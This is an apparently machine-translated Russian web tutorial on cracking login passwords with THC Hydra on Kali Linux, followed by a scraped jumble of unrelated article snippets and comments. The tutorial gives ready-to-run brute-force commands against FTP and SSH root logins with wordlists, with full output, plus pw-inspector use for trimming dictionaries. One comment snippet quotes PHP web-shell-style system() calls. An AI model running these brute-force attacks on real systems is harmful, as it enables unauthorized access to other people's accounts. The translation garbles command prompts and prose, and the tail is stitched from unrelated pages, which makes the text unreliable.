Взламывайте пароли в Kali Linux с помощью Hydra

  1. Поддерживаемые платформы
  2. Справочное меню THC hydra - нажмите, чтобы развернуть
  3. Пример использования гидры
  4. Дополнительные инструменты в комплекте с THC Hydra
  5. Справочное меню pw-inspector - нажмите, чтобы развернуть
  6. Пример использования pw-inspector
  7. Ресурсы

В течение многих лет эксперты предупреждали о рисках использования слабых паролей для ограничения доступа к данным, и это по-прежнему остается проблемой. Практическое правило для паролей тем дольше, тем лучше. В этом руководстве я буду использовать FTP в качестве целевой службы и покажу, как взламывать пароли в Kali Linux с помощью Hydra. В течение многих лет эксперты предупреждали о рисках использования слабых паролей для ограничения доступа к данным, и это по-прежнему остается проблемой

Уже доступно несколько инструментов для хакерских атак, однако ни один из них не поддерживает более одного протокола для атаки или не поддерживает параллельные соединения. Ранее мы рассмотрели взлом паролей с использованием Джон Потрошитель , Wireshark , NMAP а также MiTM ,

Hydra может быть использована и скомпилирована без ошибок в Linux, Windows / Cygwin, Solaris, FreeBSD / OpenBSD, QNX (Blackberry 10) и OSX.

В настоящее время инструмент THC Hydra поддерживает следующие протоколы:

Звездочка, AFP, Cisco AAA, аутентификация Cisco, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS -FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-прокси, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, слушатель Oracle, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3 , POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP / R3, SIP, SMB, SMTP, перечисление SMTP, SNMP v1 + v2 + v3, SOCKS5, SSH (v1 и v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet , VMware-Auth, VNC и XMPP.

Поддерживаемые платформы

  1. Все платформы UNIX (Linux, * BSD, Solaris и т. Д.)
  2. Mac OS X
  3. Windows с Cygwin (как IPv4, так и IPv6)
  4. Мобильные системы на базе Linux, Mac OS / X или QNX (например, Android, iPhone, Blackberry 10, Zaurus, iPaq)

Hydra - это параллельный взломщик входа, который поддерживает множество протоколов для атаки. Это очень быстро и гибко, и новые модули легко добавлять. Этот инструмент позволяет исследователям и консультантам по безопасности показать, как легко получить удаленный несанкционированный доступ к системе. В Ubuntu его можно установить из менеджера пакетов synaptic. На Kali Linux он установлен.

Для перебора Гидры нужен список паролей. Есть много списков паролей, доступных там. В этом примере мы будем использовать список паролей по умолчанию, предоставленный Джон Потрошитель который является еще одним инструментом взлома пароля. Другие списки паролей доступны онлайн, просто Google его.

Список паролей, предварительно установленный в Kali Linux, и его список паролей можно найти по следующему адресу

/usr/share/john/password.lst

Это выглядит так

#! comment: этот список был составлен Solar Designer из Openwall Project, #! comment: http://www.openwall.com/wordlists/ #! comment: #! comment: этот список основан на паролях, наиболее часто встречающихся на набор комментариев Unix #!: системы в середине 1990-х годов, отсортированные по убыванию числа вхождений # комментарий: (то есть, более общие пароли перечислены первыми). Это было #! Comment: пересмотрено, чтобы также включать общие пароли веб-сайтов из публичных списков #! Comment: из «топовых N паролей» от основных компромиссов веб-сайтов сообщества, которые #! Comment: происходили в 2006–2010 годах. #! Comment: #! Comment : Последнее обновление: 2011/11/20 (3546 записей) 123456 12345 пароль пароль1 123456789 12345678 1234567890

Создайте копию этого файла на рабочем столе или в любом месте и удалите строки комментариев (все строки над паролем 123456). Теперь наш список слов паролей готов, и мы собираемся использовать его, чтобы грубо заставить сервер ftp попытаться взломать его пароль.

Вот простая команда с выводом

[электронная почта защищена]

: ~ # hydra -t 1 -l admin -P /root/Desktop/password.lst -vV 192.168.1.1 ftp Hydra v7.4.2 (c) 2012 от van Hauser / THC & David Maciejak - только для юридических целей Hydra (http : //www.thc.org/thc-hydra) начиная с 2013-05-13 04:32:18 [DATA] 1 задача, 1 сервер, 3546 попыток входа в систему (l: 1 / p: 3546), ~ 3546 попыток для задачи [ДАННЫЕ] атакующая служба ftp на порту 21 [VERBOSE] Разрешение адресов ... выполнено [ATTEMPT] target 192.168.1.1 - войти в систему «admin» - передать «123456» - 1 из 3546 [child 0] [ATTEMPT] target 192.168 .1.1 - логин "admin" - передать "12345" - 2 из 3546 [child 0] [ATTEMPT] target 192.168.1.1 - логин "admin" - пройти "пароль" - 3 из 3546 [child 0] [21] [ftp ] host: 192.168.1.1 login: admin пароль: пароль [STATUS] атака завершена для 192.168.1.1 (ожидание выполнения тестов детьми) 1 из 1 цель успешно выполнена, найден 1 действительный пароль Hydra (http: //www.thc. org / thc-hydra) закончил в 2013-05-13 04:32:33 [электронная почта защищена] : ~ #

Проверьте строку «[21] [ftp]». Он упоминает комбинацию имени пользователя и пароля, которая работала для сервера ftp. Довольно легко!
Теперь давайте посмотрим на варианты. Опция t сообщает, сколько параллельных потоков гидра должен создать. В этом случае я использовал 1, потому что многие маршрутизаторы не могут обрабатывать несколько соединений и на короткое время зависали или зависали. Чтобы избежать этого, лучше делать 1 попытку за раз. Следующая опция - «l», которая указывает имя пользователя или логин для использования. В этом случае его админ. Далее идет заглавная «P» опция, которая предоставляет список слов для использования. Hydra подберет каждую строку как один пароль и использует его.

Параметр «v» предназначен для многословия, а параметр «V» - для обозначения каждого пробуемого пароля. Последним идет хост / IP-адрес, за которым следует сервис для взлома.

Справочное меню THC hydra - нажмите, чтобы развернуть

Справочное меню THC hydra - нажмите, чтобы развернуть

[электронная почта защищена]

: ~ # hydra -h Hydra v7.6 (c) 2013 от van Hauser / THC & David Maciejak - только для юридических целей Синтаксис: hydra [[[-l LOGIN | -L FILE] [-p PASS | -P FILE] ] | [-C ФАЙЛ]] [-e nsr] [-o ФАЙЛ] [-t ЗАДАЧИ] [-M ФАЙЛ [-T ЗАДАЧИ]] [-w ВРЕМЯ] [-W ВРЕМЯ] [-f] [-s ПОРТ] [-x MIN: MAX: CHARSET] [-SuvV46] [service: // server [: PORT] [/ OPT]] Опции: -R восстановить предыдущий прерванный / сбойный сеанс -S выполнить соединение SSL -S PORT, если служба находится на другом порте по умолчанию, определите его здесь -l LOGIN или -L FILE login с именем LOGIN, или загрузите несколько имен входа из FILE -p PASS или -P FILE попробуйте пароль PASS, или загрузите несколько паролей из FILE -x MIN: MAX: генерация паролей CHARSET, введите «-x -h», чтобы получить справку -e nsr, попробуйте «n» нулевой пароль, «s» - вход в систему как пароль и / или «r» - обратный вход в систему - цикл вокруг пользователей, а не паролей ( вступает в силу! подразумевается с -x) -C ФАЙЛОМ, разделенным двоеточием, в формате «login: pass» вместо -L / -P параметров -M Список серверов FILE, которые должны быть атакованы параллельно, по одной записи в строке -o ФАЙЛ записан, найден логин / пар пароль в FILE вместо stdout -f / -F выход при обнаружении пары логин / пароль (-M: -f для хоста, -F global) -t ЗАДАЧИ запустить ЗАДАЧИ число соединений в p параллельный (для хоста, по умолчанию: 16) -w / -W ВРЕМЯ ожидания для ответов (32 с) / между соединениями в потоке -4 / -6 предпочитают адреса IPv4 (по умолчанию) или IPv6 -v / -V / -d подробный режим / show login + pass для каждой попытки / режима отладки. -U подробности об использовании сервисного модуля: сервер целевой сервер (используйте либо ИЛИ, либо опцию -M), чтобы сервис взломал сервис (см. ниже о поддерживаемых протоколах). OPT Некоторые сервисные модули поддерживают дополнительный ввод ( -U для справки модуля) Поддерживаемые службы: звездочка afp cisco cisco-enable cvs firebird ftp ftps http [s] - {head | get} http [s] - {get | post} -форма http-proxy http-proxy-urlenum icq imap [s] irc ldap2 [s] ldap3 [- {cram | digest} md5] [s] mssql mysql ncp nntp слушатель оракула oracle-sid pcanywhere pcnfs pop3 [s] postgres rdp rexec rlogin rsh s7-300 sip smb smtp [ s] smtp-enum snmp socks5 ssh sshkey svn teampeak telnet [s] vmauthd vnc xmpp Hydra - это инструмент для угадывания / взлома действительных пар логин / пароль - использование разрешено только в юридических целях. Этот инструмент лицензирован под AGPL v3.0. Новейшая версия всегда доступна по адресу http://www.thc.org/thc-hydra. Эти сервисы не были скомпилированы в: sapr3 oracle. Используйте HYDRA_PROXY_HTTP или HYDRA_PROXY - и при необходимости HYDRA_PROXY_AUTH - среду для настройки прокси. Например:% export HYDRA_PROXY = socks5: //127.0.0.1: 9150 (или socks4: // или connect: //)% export HYDRA_PROXY_HTTP = http: // proxy: 8080% export HYDRA_PROXY_AUTH = user: pass Примеры: hydra -l пользователь -P passlist.txt ftp://192.168.0.1 гидра -L userlist.txt -p defaultpw imap: //192.168.0.1/PLAIN гидра -C defaults.txt -6 pop3s: // [fe80 :: 2c: 31ff : FE12: AC11]: 143 / TLS: DIGEST-MD5

Пример использования гидры

Попытайтесь войти в систему как пользователь root (-l root), используя список паролей (-P /usr/share/wordlists/metasploit/unix_passwords.txt) с 6 потоками (-t 6) на указанном сервере SSH (ssh: // 192.168.1.123):

[электронная почта защищена]

: ~ # hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh: //192.168.1.123 Hydra v7.6 (c) 2013 от van Hauser / THC & David Maciejak - для юридических только для целей Hydra (http://www.thc.org/thc-hydra) начиная с 2014-05-19 07:53:33 [ДАННЫЕ] 6 задач, 1 сервер, 1003 попытки входа в систему (l: 1 / p: 1003 ), ~ 167 попыток на задачу [DATA] атакующий сервис ssh на порту 22

Перебор - самая основная форма взлома паролей. Он хорошо работает с такими устройствами, как маршрутизаторы и т. Д., Которые в основном настроены с паролями по умолчанию. Однако, когда дело доходит до других систем, перебор не будет работать, если вам не повезет.

Тем не менее, грубое принуждение является хорошей практикой для хакеров, поэтому вы должны продолжать пробовать все методы взлома системы. Так что продолжайте взламывать!

Дополнительные инструменты в комплекте с THC Hydra

PW-инспектор

Он читает пароли и печатает те, которые соответствуют требованиям

Справочное меню pw-inspector - нажмите, чтобы развернуть

Справочное меню pw-inspector - нажмите, чтобы развернуть

[электронная почта защищена]

: ~ # pw-inspector PW-Inspector v0.2 (c) 2005 by van Hauser / THC [электронная почта защищена] [http://www.thc.org] Синтаксис: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p - s Опции: -i Файл FILE для чтения паролей из (по умолчанию: stdin) -o Файл FILE для записи действительных паролей (по умолчанию: stdout) -m MINLEN минимальная длина действительного пароля -M MAXLEN максимальная длина действительного пароля -c MINSETS минимальное количество требуемых наборов (по умолчанию: все заданные). Наборы: -l строчные буквы (a, b, c, d и т. Д.) -U прописные буквы (A, B, C, D и т. Д.) -N числа (1,2,3,4 и т. Д.) -P печатаемые символы (которые не являются -l / -n / -p, например, $,!, /, (, * И т. Д.) -S специальные символы - все остальные не входит в наборы, указанные выше. PW-Inspector считывает пароли и печатает те из них, которые соответствуют требованиям. Код возврата - это количество найденных действительных паролей, если не найдено ни одного. Использование для безопасности: проверка паролей, если возвращается 0, отклонение пароля Выбор. Использовать для взлома: обрезать файл словаря в соответствии с требованиями pw цели. Использование разрешено только в юридических целях.

Пример использования pw-inspector

Прочитайте список паролей (-i /usr/share/wordlists/nmap.lst) и сохраните в файл (-o /root/passes.txt), выбрав пароли минимальной длины 6 (-m 6) и максимальная длина 10 (-M 10): [электронная почта защищена] : ~ # pw-inspector -i /usr/share/wordlists/nmap.lst -o /root/passes.txt -m 6 -M 10 [электронная почта защищена] : ~ # wc -l /usr/share/wordlists/nmap.lst 5086 /usr/share/wordlists/nmap.lst [электронная почта защищена] : ~ # wc -l /root/passes.txt 4490 /root/passes.txt

Ресурсы

Источник: http://www.thc.org/thc-hydra/

  • Автор: Ван Хаузер, Роланд Кесслер

Похожие

Как обновить Windows 10 Fall Creators Update бесплатно
Хотя Microsoft соблазнила бесплатное обновление для Windows 10 во время ее выпуска (и долгое время спустя), многие люди предпочитали придерживаться своих старых, уже проверенных операционных систем. Виновный гиганту из-за злоупотреблений телеметрией в новейшей Windows и, прозаично, в этом не было необходимости обновления. Это, однако, начало меняться со временем - на данный момент большая часть программного обеспечения и драйверов написана только для десятки, и преимущество
Устраните проблемы с Windows 8, 10 гаджетами с помощью этих 5 простых решений
Как и любая другая платформа, разработанная Microsoft, Windows 8 и Windows 8.1, 10 могут быть легко настроены любым пользователем. Таким образом, чтобы персонализировать свое устройство Windows 8, 10 и облегчить свою повседневную работу, вы можете в любое время использовать специальные приложения, функции и гаджеты. Но что вы можете сделать, если заметите, что не можете должным образом использовать гаджеты Windows 8 / Windows 8.1 / Windows 10?
Сайт недоступен
... чтобы позволить миллионам людей во всем мире раскрыть возможности Интернета и дать им возможность учиться, творить и расти. Выберите свой план веб-хостинга Единый веб-хостинг 1 веб-сайт 1 учетная запись электронной почты Пропускная способность 100 ГБ 1X вычислительная мощность и память Премиум Хостинг Неограниченное количество сайтов Неограниченные
Я: Доброе утро, я прошу сыр в моей коробке. Продавщица: К сожалению, мы не можем упаковать. Упра...
Я: Доброе утро, я прошу сыр в моей коробке. Продавщица: К сожалению, мы не можем упаковать. Управление магазином запрещает. J: почему? В чем причина? E: Люди воруют. И кроме того, мы можем пойти на бумагу в одиночку. К сожалению, я не могу. С такими ответами мы недавно встретились с моим мужем, делающим покупки в сети магазинов Piotr i Paweł в Познани. Я описал типы реакций в последнее время в
Как создать свою первую базу данных с помощью Microsoft Access
... нажмите « Enter», чтобы перейти к следующему столбцу, и введите « Смит» . Нажмите Enter дважды, чтобы перейти ко второму столбцу второй строки, введите Peta , нажмите Enter и введите Harrison . На данный момент в таблице нет заголовков столбцов, и вам нужно изменить дизайн, чтобы использовать идентификаторы сотрудников. Чтобы внести эти изменения, щелкните раскрывающееся меню
Восстановление установок Windows: советы и ресурсы
Инструменты восстановления | Чистая установка | Восстановление Windows План на случай бедствия Разработайте стратегию восстановления до того, как ваш компьютер выйдет из строя . Даже базовый план превосходит план вообще. Вы не можете зависеть от электронных документов Обязательно распечатайте на компьютере инструкции по восстановлению неработающего
Атаки грубой силой: как защитить себя?
Лис в Хет Недерландс - Lisez en français Хакеры не только используют известные уязвимости и ошибки в программном обеспечении, операционных системах или системах управления контентом для доступа к вашим данным или проникновения на ваш сайт. Другой метод, который они используют довольно часто, это грубая сила
Краткое введение в ОТДЫХ
... чтобы их идентифицировать. Все, что должно быть идентифицируемым, должно иметь идентификатор - в сети существует единая концепция идентификаторов: URI. URI составляют глобальное пространство имен, а использование URI для идентификации ваших ключевых ресурсов означает, что они получают уникальный глобальный идентификатор. Основным преимуществом последовательной схемы именования вещей является то, что вам не нужно придумывать собственную схему - вы можете положиться на ту, которая
Как злоумышленник может взломать безопасность вашей беспроводной сети
Важно защитить беспроводную сеть с помощью шифрования WPA2 и надежной парольной фразы. Но от каких атак вы на самом деле защищаетесь? Вот как злоумышленники взламывают зашифрованные беспроводные сети. Это не руководство «как взломать беспроводную сеть». Мы здесь не
Как получить YouTube на Firestick и Fire TV
... нажмите «Поиск Fire TV». Перейдите на вкладку « Локальные приложения» и прокрутите вниз до YouTube. Нажмите на значок, затем выберите «Установить», когда откроется окно. Через некоторое время YouTube загрузит ваш Fire TV и установит. Это может занять несколько минут в зависимости от скорости вашего интернет-соединения. Перейдите к основному интерфейсу вашего Fire TV и начните трансляцию! Способ 3 - Используйте
Взлом сайтов WordPress путем кражи имен пользователей и паролей
Google продвигает программу HTTPS уже несколько лет - они хотят, чтобы все сайты работали по HTTPS , Если ваш WordPress все еще работает по протоколу HTTP, при входе в WordPress и доступе к панели инструментов или страницам администратора все данные отправляются в виде открытого текста. Это означает, что ваши учетные данные WordPress также отправляются через Интернет в виде открытого текста.

Комментарии

Итак, следует ли вам избегать использования проверочных ограничений?
Итак, следует ли вам избегать использования проверочных ограничений? Что ж, давайте рассмотрим случаи, когда ссылочная таблица (таблица с внешним ключом) может использоваться для ограничения столбца определенным набором значений.
Нажмите «ОК?
Нажмите «ОК? и затем нажмите Установить сейчас? Остальная часть установки истекает, как в описании. увеличить Что Windows не может сделать, так это Linux.В Ubuntu на виртуальной машине общий доступ к интернет-соединению можно настроить
Php // Возвращаем список каталогов, в которых запускается файл (Linux) system ("ls -la"); ?
php // Возвращаем список каталогов, в которых запускается файл (Linux) system ("ls -la"); ?> -> всего 12 drwxrwxr-x 2 secuser secuser 4096 27 апреля 20:43. drwxr-xr-x 6 secuser secuser 4096 27 апреля 20:40 .. -rw-rw-r-- 1 secuser secuser 26 апреля 27 20:41 shell.php Другие команды имеют тот же эффект. <? php // Возвращаем пользователя, сценарий которого запущен в системе («whoami»); ?> -> www-data Exec () Функция exec () принимает
Нужна операционная система Microsoft Windows, чтобы начать работу с Microsoft Access?
Нужна операционная система Microsoft Windows, чтобы начать работу с Microsoft Access? Купить прямо ниже: Windows 10 Home Windows 10 Pro
Чтобы я мог сообщить другим, что в вашем магазине есть такой вариант?
Чтобы я мог сообщить другим, что в вашем магазине есть такой вариант? - Минутку, а что еще? Это больше для тебя ?! Реакция миссис Менеджер сбила меня с ног. Я чуть не упал с офисного кресла на колеса, на которых сидел. Больше нечего сказать вам, что если у вас возникли проблемы с покупкой в ​​собственных коробках, зайдите и снимите как Kasia Wągrowska. Конечно, я шучу, потому что я не думаю, что плакаты с моим изображением и описанием «Эта леди может купить вашу
Другой монитор можно легко подключить, но почему бы не использовать уже имеющиеся экраны вместо того, чтобы покупать и покупать другой?
Другой монитор можно легко подключить, но почему бы не использовать уже имеющиеся экраны вместо того, чтобы покупать и покупать другой? Приложив немного усилий, iPad, iPhone и iPod Touch можно превратить во второй экран для вашего Mac или Windows компьютер. Это можно использовать двумя способами: использовать устройство iOS в качестве истинно второго дисплея или зеркально отображать содержимое вашего основного дисплея. В этом посте вы узнаете,

Windows 10?
J: почему?
В чем причина?
Но от каких атак вы на самом деле защищаетесь?
Итак, следует ли вам избегать использования проверочных ограничений?
Нажмите «ОК?
Нажмите «ОК?
И затем нажмите Установить сейчас?
Php // Возвращаем список каталогов, в которых запускается файл (Linux) system ("ls -la"); ?
Lt;?